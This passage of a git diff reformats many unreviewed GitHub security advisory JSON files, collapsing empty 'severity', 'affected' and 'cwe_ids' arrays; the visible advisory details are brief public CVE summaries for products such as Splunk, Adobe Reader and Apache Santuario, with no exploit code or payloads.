@@ "CVE-2010-2429" ], "details": "Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.1.2, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer in a \"404 Not Found\" response.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pgc6-fg9r-vjj4/GHSA-pgc6-fg9r-vjj4.json b/advisories/unreviewed/2022/05/GHSA-pgc6-fg9r-vjj4/GHSA-pgc6-fg9r-vjj4.json index ee0873e568a..646fec2287e 100644 --- a/advisories/unreviewed/2022/05/GHSA-pgc6-fg9r-vjj4/GHSA-pgc6-fg9r-vjj4.json +++ b/advisories/unreviewed/2022/05/GHSA-pgc6-fg9r-vjj4/GHSA-pgc6-fg9r-vjj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pm3j-2jrw-2gmq/GHSA-pm3j-2jrw-2gmq.json b/advisories/unreviewed/2022/05/GHSA-pm3j-2jrw-2gmq/GHSA-pm3j-2jrw-2gmq.json index 7ae1817e329..0fee2a62552 100644 --- a/advisories/unreviewed/2022/05/GHSA-pm3j-2jrw-2gmq/GHSA-pm3j-2jrw-2gmq.json +++ b/advisories/unreviewed/2022/05/GHSA-pm3j-2jrw-2gmq/GHSA-pm3j-2jrw-2gmq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pmgg-9f6f-p4wr/GHSA-pmgg-9f6f-p4wr.json b/advisories/unreviewed/2022/05/GHSA-pmgg-9f6f-p4wr/GHSA-pmgg-9f6f-p4wr.json index 9c8e75a3736..a837dc4a1aa 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmgg-9f6f-p4wr/GHSA-pmgg-9f6f-p4wr.json +++ b/advisories/unreviewed/2022/05/GHSA-pmgg-9f6f-p4wr/GHSA-pmgg-9f6f-p4wr.json @@ -7,12 +7,8 @@ "CVE-2013-5016" ], "details": "Symantec Critical System Protection (SCSP) before 5.2.9, when installed on an unpatched Windows Server 2003 R2 platform, allows remote attackers to bypass policy settings via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pp5m-5cvr-qhx9/GHSA-pp5m-5cvr-qhx9.json b/advisories/unreviewed/2022/05/GHSA-pp5m-5cvr-qhx9/GHSA-pp5m-5cvr-qhx9.json index 8049c5822e5..ead8c0a4831 100644 --- a/advisories/unreviewed/2022/05/GHSA-pp5m-5cvr-qhx9/GHSA-pp5m-5cvr-qhx9.json +++ b/advisories/unreviewed/2022/05/GHSA-pp5m-5cvr-qhx9/GHSA-pp5m-5cvr-qhx9.json @@ -7,12 +7,8 @@ "CVE-2015-4451" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4445, CVE-2015-4447, CVE-2015-4452, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ppj4-3gw8-jmj9/GHSA-ppj4-3gw8-jmj9.json b/advisories/unreviewed/2022/05/GHSA-ppj4-3gw8-jmj9/GHSA-ppj4-3gw8-jmj9.json index e21befd0c59..ec059292b7e 100644 --- a/advisories/unreviewed/2022/05/GHSA-ppj4-3gw8-jmj9/GHSA-ppj4-3gw8-jmj9.json +++ b/advisories/unreviewed/2022/05/GHSA-ppj4-3gw8-jmj9/GHSA-ppj4-3gw8-jmj9.json @@ -7,12 +7,8 @@ "CVE-2015-6715" ], "details": "The Function apply implementation in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pqpx-gpvg-4m34/GHSA-pqpx-gpvg-4m34.json b/advisories/unreviewed/2022/05/GHSA-pqpx-gpvg-4m34/GHSA-pqpx-gpvg-4m34.json index 36442f72767..e530def0ce7 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqpx-gpvg-4m34/GHSA-pqpx-gpvg-4m34.json +++ b/advisories/unreviewed/2022/05/GHSA-pqpx-gpvg-4m34/GHSA-pqpx-gpvg-4m34.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pqqq-8453-mph5/GHSA-pqqq-8453-mph5.json b/advisories/unreviewed/2022/05/GHSA-pqqq-8453-mph5/GHSA-pqqq-8453-mph5.json index 1c181d0e1f0..1384939886e 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqqq-8453-mph5/GHSA-pqqq-8453-mph5.json +++ b/advisories/unreviewed/2022/05/GHSA-pqqq-8453-mph5/GHSA-pqqq-8453-mph5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-prwr-fqmv-g965/GHSA-prwr-fqmv-g965.json b/advisories/unreviewed/2022/05/GHSA-prwr-fqmv-g965/GHSA-prwr-fqmv-g965.json index f649605c241..e45ed8c7eea 100644 --- a/advisories/unreviewed/2022/05/GHSA-prwr-fqmv-g965/GHSA-prwr-fqmv-g965.json +++ b/advisories/unreviewed/2022/05/GHSA-prwr-fqmv-g965/GHSA-prwr-fqmv-g965.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-prxv-hgr8-whhf/GHSA-prxv-hgr8-whhf.json b/advisories/unreviewed/2022/05/GHSA-prxv-hgr8-whhf/GHSA-prxv-hgr8-whhf.json index a82be04b6df..e96a4da82be 100644 --- a/advisories/unreviewed/2022/05/GHSA-prxv-hgr8-whhf/GHSA-prxv-hgr8-whhf.json +++ b/advisories/unreviewed/2022/05/GHSA-prxv-hgr8-whhf/GHSA-prxv-hgr8-whhf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pvw6-76ww-4x7m/GHSA-pvw6-76ww-4x7m.json b/advisories/unreviewed/2022/05/GHSA-pvw6-76ww-4x7m/GHSA-pvw6-76ww-4x7m.json index 6958b1c8944..8d3d55367d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-pvw6-76ww-4x7m/GHSA-pvw6-76ww-4x7m.json +++ b/advisories/unreviewed/2022/05/GHSA-pvw6-76ww-4x7m/GHSA-pvw6-76ww-4x7m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pw48-2qx8-7cxx/GHSA-pw48-2qx8-7cxx.json b/advisories/unreviewed/2022/05/GHSA-pw48-2qx8-7cxx/GHSA-pw48-2qx8-7cxx.json index f07abd6cb8a..d025b6a826a 100644 --- a/advisories/unreviewed/2022/05/GHSA-pw48-2qx8-7cxx/GHSA-pw48-2qx8-7cxx.json +++ b/advisories/unreviewed/2022/05/GHSA-pw48-2qx8-7cxx/GHSA-pw48-2qx8-7cxx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pxc9-7g5q-6fjm/GHSA-pxc9-7g5q-6fjm.json b/advisories/unreviewed/2022/05/GHSA-pxc9-7g5q-6fjm/GHSA-pxc9-7g5q-6fjm.json index 76556c87d35..7acd2c1df6f 100644 --- a/advisories/unreviewed/2022/05/GHSA-pxc9-7g5q-6fjm/GHSA-pxc9-7g5q-6fjm.json +++ b/advisories/unreviewed/2022/05/GHSA-pxc9-7g5q-6fjm/GHSA-pxc9-7g5q-6fjm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q29q-rg5m-wg5j/GHSA-q29q-rg5m-wg5j.json b/advisories/unreviewed/2022/05/GHSA-q29q-rg5m-wg5j/GHSA-q29q-rg5m-wg5j.json index 0be7568df69..7a5f5602967 100644 --- a/advisories/unreviewed/2022/05/GHSA-q29q-rg5m-wg5j/GHSA-q29q-rg5m-wg5j.json +++ b/advisories/unreviewed/2022/05/GHSA-q29q-rg5m-wg5j/GHSA-q29q-rg5m-wg5j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q3gr-4m8w-ff7m/GHSA-q3gr-4m8w-ff7m.json b/advisories/unreviewed/2022/05/GHSA-q3gr-4m8w-ff7m/GHSA-q3gr-4m8w-ff7m.json index ebcc2d2e17a..8b8040c8a99 100644 --- a/advisories/unreviewed/2022/05/GHSA-q3gr-4m8w-ff7m/GHSA-q3gr-4m8w-ff7m.json +++ b/advisories/unreviewed/2022/05/GHSA-q3gr-4m8w-ff7m/GHSA-q3gr-4m8w-ff7m.json @@ -7,12 +7,8 @@ "CVE-2015-4547" ], "details": "EMC RSA Web Threat Detection before 5.1 SP1 stores a cleartext AnnoDB password in a configuration file, which allows remote authenticated users to obtain sensitive information by reading this file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q436-57hq-3j3g/GHSA-q436-57hq-3j3g.json b/advisories/unreviewed/2022/05/GHSA-q436-57hq-3j3g/GHSA-q436-57hq-3j3g.json index 3ecbbbb1cc0..ccb364f8303 100644 --- a/advisories/unreviewed/2022/05/GHSA-q436-57hq-3j3g/GHSA-q436-57hq-3j3g.json +++ b/advisories/unreviewed/2022/05/GHSA-q436-57hq-3j3g/GHSA-q436-57hq-3j3g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q4p6-fc6x-phmp/GHSA-q4p6-fc6x-phmp.json b/advisories/unreviewed/2022/05/GHSA-q4p6-fc6x-phmp/GHSA-q4p6-fc6x-phmp.json index ad17c215a92..8ba1813f7c3 100644 --- a/advisories/unreviewed/2022/05/GHSA-q4p6-fc6x-phmp/GHSA-q4p6-fc6x-phmp.json +++ b/advisories/unreviewed/2022/05/GHSA-q4p6-fc6x-phmp/GHSA-q4p6-fc6x-phmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q6gc-h25f-hw7c/GHSA-q6gc-h25f-hw7c.json b/advisories/unreviewed/2022/05/GHSA-q6gc-h25f-hw7c/GHSA-q6gc-h25f-hw7c.json index f588ce23014..4a121c19b9a 100644 --- a/advisories/unreviewed/2022/05/GHSA-q6gc-h25f-hw7c/GHSA-q6gc-h25f-hw7c.json +++ b/advisories/unreviewed/2022/05/GHSA-q6gc-h25f-hw7c/GHSA-q6gc-h25f-hw7c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q7mp-jrv7-5p64/GHSA-q7mp-jrv7-5p64.json b/advisories/unreviewed/2022/05/GHSA-q7mp-jrv7-5p64/GHSA-q7mp-jrv7-5p64.json index f130bdc88ec..7159d404ac0 100644 --- a/advisories/unreviewed/2022/05/GHSA-q7mp-jrv7-5p64/GHSA-q7mp-jrv7-5p64.json +++ b/advisories/unreviewed/2022/05/GHSA-q7mp-jrv7-5p64/GHSA-q7mp-jrv7-5p64.json @@ -7,12 +7,8 @@ "CVE-2015-5095" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-4448, CVE-2015-5099, CVE-2015-5101, CVE-2015-5111, CVE-2015-5113, and CVE-2015-5114.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q7r5-p629-gmc5/GHSA-q7r5-p629-gmc5.json b/advisories/unreviewed/2022/05/GHSA-q7r5-p629-gmc5/GHSA-q7r5-p629-gmc5.json index e24a695c523..2e28b3dde0c 100644 --- a/advisories/unreviewed/2022/05/GHSA-q7r5-p629-gmc5/GHSA-q7r5-p629-gmc5.json +++ b/advisories/unreviewed/2022/05/GHSA-q7r5-p629-gmc5/GHSA-q7r5-p629-gmc5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q7vw-gjh3-qf97/GHSA-q7vw-gjh3-qf97.json b/advisories/unreviewed/2022/05/GHSA-q7vw-gjh3-qf97/GHSA-q7vw-gjh3-qf97.json index b06989776b3..0ccef77ee34 100644 --- a/advisories/unreviewed/2022/05/GHSA-q7vw-gjh3-qf97/GHSA-q7vw-gjh3-qf97.json +++ b/advisories/unreviewed/2022/05/GHSA-q7vw-gjh3-qf97/GHSA-q7vw-gjh3-qf97.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q9gf-67qr-pxc7/GHSA-q9gf-67qr-pxc7.json b/advisories/unreviewed/2022/05/GHSA-q9gf-67qr-pxc7/GHSA-q9gf-67qr-pxc7.json index d7cbea80372..48ce13be309 100644 --- a/advisories/unreviewed/2022/05/GHSA-q9gf-67qr-pxc7/GHSA-q9gf-67qr-pxc7.json +++ b/advisories/unreviewed/2022/05/GHSA-q9gf-67qr-pxc7/GHSA-q9gf-67qr-pxc7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qf7c-h979-xgw9/GHSA-qf7c-h979-xgw9.json b/advisories/unreviewed/2022/05/GHSA-qf7c-h979-xgw9/GHSA-qf7c-h979-xgw9.json index 4f882a3215d..7b1bd3ba98c 100644 --- a/advisories/unreviewed/2022/05/GHSA-qf7c-h979-xgw9/GHSA-qf7c-h979-xgw9.json +++ b/advisories/unreviewed/2022/05/GHSA-qf7c-h979-xgw9/GHSA-qf7c-h979-xgw9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qf8v-cvhw-6694/GHSA-qf8v-cvhw-6694.json b/advisories/unreviewed/2022/05/GHSA-qf8v-cvhw-6694/GHSA-qf8v-cvhw-6694.json index 27a48733590..93574d6c76a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qf8v-cvhw-6694/GHSA-qf8v-cvhw-6694.json +++ b/advisories/unreviewed/2022/05/GHSA-qf8v-cvhw-6694/GHSA-qf8v-cvhw-6694.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qjv7-88rf-3mf4/GHSA-qjv7-88rf-3mf4.json b/advisories/unreviewed/2022/05/GHSA-qjv7-88rf-3mf4/GHSA-qjv7-88rf-3mf4.json index c33b352ae8f..2985add79b2 100644 --- a/advisories/unreviewed/2022/05/GHSA-qjv7-88rf-3mf4/GHSA-qjv7-88rf-3mf4.json +++ b/advisories/unreviewed/2022/05/GHSA-qjv7-88rf-3mf4/GHSA-qjv7-88rf-3mf4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qm7x-7jjj-7r38/GHSA-qm7x-7jjj-7r38.json b/advisories/unreviewed/2022/05/GHSA-qm7x-7jjj-7r38/GHSA-qm7x-7jjj-7r38.json index c512d4596df..91787e1fd37 100644 --- a/advisories/unreviewed/2022/05/GHSA-qm7x-7jjj-7r38/GHSA-qm7x-7jjj-7r38.json +++ b/advisories/unreviewed/2022/05/GHSA-qm7x-7jjj-7r38/GHSA-qm7x-7jjj-7r38.json @@ -7,12 +7,8 @@ "CVE-2013-2156" ], "details": "Heap-based buffer overflow in the Exclusive Canonicalization functionality (xsec/canon/XSECC14n20010315.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted PrefixList attribute.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qm8j-pmc4-xr8w/GHSA-qm8j-pmc4-xr8w.json b/advisories/unreviewed/2022/05/GHSA-qm8j-pmc4-xr8w/GHSA-qm8j-pmc4-xr8w.json index 75b06256cf2..8ec6b8f4f1d 100644 --- a/advisories/unreviewed/2022/05/GHSA-qm8j-pmc4-xr8w/GHSA-qm8j-pmc4-xr8w.json +++ b/advisories/unreviewed/2022/05/GHSA-qm8j-pmc4-xr8w/GHSA-qm8j-pmc4-xr8w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qm8x-gp66-4vfh/GHSA-qm8x-gp66-4vfh.json b/advisories/unreviewed/2022/05/GHSA-qm8x-gp66-4vfh/GHSA-qm8x-gp66-4vfh.json index 059485d590b..c93e7245644 100644 --- a/advisories/unreviewed/2022/05/GHSA-qm8x-gp66-4vfh/GHSA-qm8x-gp66-4vfh.json +++ b/advisories/unreviewed/2022/05/GHSA-qm8x-gp66-4vfh/GHSA-qm8x-gp66-4vfh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qpgr-gj53-5m6w/GHSA-qpgr-gj53-5m6w.json b/advisories/unreviewed/2022/05/GHSA-qpgr-gj53-5m6w/GHSA-qpgr-gj53-5m6w.json index 0417e4cac4e..6af3e87cf7a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qpgr-gj53-5m6w/GHSA-qpgr-gj53-5m6w.json +++ b/advisories/unreviewed/2022/05/GHSA-qpgr-gj53-5m6w/GHSA-qpgr-gj53-5m6w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qv58-xpxr-7hjx/GHSA-qv58-xpxr-7hjx.json b/advisories/unreviewed/2022/05/GHSA-qv58-xpxr-7hjx/GHSA-qv58-xpxr-7hjx.json index 715e23b69ea..9cd8dbc82e3 100644 --- a/advisories/unreviewed/2022/05/GHSA-qv58-xpxr-7hjx/GHSA-qv58-xpxr-7hjx.json +++ b/advisories/unreviewed/2022/05/GHSA-qv58-xpxr-7hjx/GHSA-qv58-xpxr-7hjx.json @@ -7,12 +7,8 @@ "CVE-2015-5111" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-4448, CVE-2015-5095, CVE-2015-5099, CVE-2015-5101, CVE-2015-5113, and CVE-2015-5114.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qvhx-9828-527h/GHSA-qvhx-9828-527h.json b/advisories/unreviewed/2022/05/GHSA-qvhx-9828-527h/GHSA-qvhx-9828-527h.json index f49f09777f5..e16b265325a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvhx-9828-527h/GHSA-qvhx-9828-527h.json +++ b/advisories/unreviewed/2022/05/GHSA-qvhx-9828-527h/GHSA-qvhx-9828-527h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qvrx-992q-w36h/GHSA-qvrx-992q-w36h.json b/advisories/unreviewed/2022/05/GHSA-qvrx-992q-w36h/GHSA-qvrx-992q-w36h.json index cf07cece04d..9036985561a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvrx-992q-w36h/GHSA-qvrx-992q-w36h.json +++ b/advisories/unreviewed/2022/05/GHSA-qvrx-992q-w36h/GHSA-qvrx-992q-w36h.json @@ -7,12 +7,8 @@ "CVE-2015-4448" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5095, CVE-2015-5099, CVE-2015-5101, CVE-2015-5111, CVE-2015-5113, and CVE-2015-5114.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qw72-xqg4-c435/GHSA-qw72-xqg4-c435.json b/advisories/unreviewed/2022/05/GHSA-qw72-xqg4-c435/GHSA-qw72-xqg4-c435.json index ab47c126238..1d6e5d204dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-qw72-xqg4-c435/GHSA-qw72-xqg4-c435.json +++ b/advisories/unreviewed/2022/05/GHSA-qw72-xqg4-c435/GHSA-qw72-xqg4-c435.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r2f3-m957-5xfx/GHSA-r2f3-m957-5xfx.json b/advisories/unreviewed/2022/05/GHSA-r2f3-m957-5xfx/GHSA-r2f3-m957-5xfx.json index 66b6427b8d9..c1f70c35126 100644 --- a/advisories/unreviewed/2022/05/GHSA-r2f3-m957-5xfx/GHSA-r2f3-m957-5xfx.json +++ b/advisories/unreviewed/2022/05/GHSA-r2f3-m957-5xfx/GHSA-r2f3-m957-5xfx.json @@ -7,12 +7,8 @@ "CVE-2008-5438" ], "details": "Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r5p4-93xq-wq75/GHSA-r5p4-93xq-wq75.json b/advisories/unreviewed/2022/05/GHSA-r5p4-93xq-wq75/GHSA-r5p4-93xq-wq75.json index f1163def104..ddae090e1f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-r5p4-93xq-wq75/GHSA-r5p4-93xq-wq75.json +++ b/advisories/unreviewed/2022/05/GHSA-r5p4-93xq-wq75/GHSA-r5p4-93xq-wq75.json @@ -7,12 +7,8 @@ "CVE-2015-6714" ], "details": "The Function bind implementation in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r6fx-qpgx-pg2w/GHSA-r6fx-qpgx-pg2w.json b/advisories/unreviewed/2022/05/GHSA-r6fx-qpgx-pg2w/GHSA-r6fx-qpgx-pg2w.json index a5d40280e82..fb98cc394b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-r6fx-qpgx-pg2w/GHSA-r6fx-qpgx-pg2w.json +++ b/advisories/unreviewed/2022/05/GHSA-r6fx-qpgx-pg2w/GHSA-r6fx-qpgx-pg2w.json @@ -7,12 +7,8 @@ 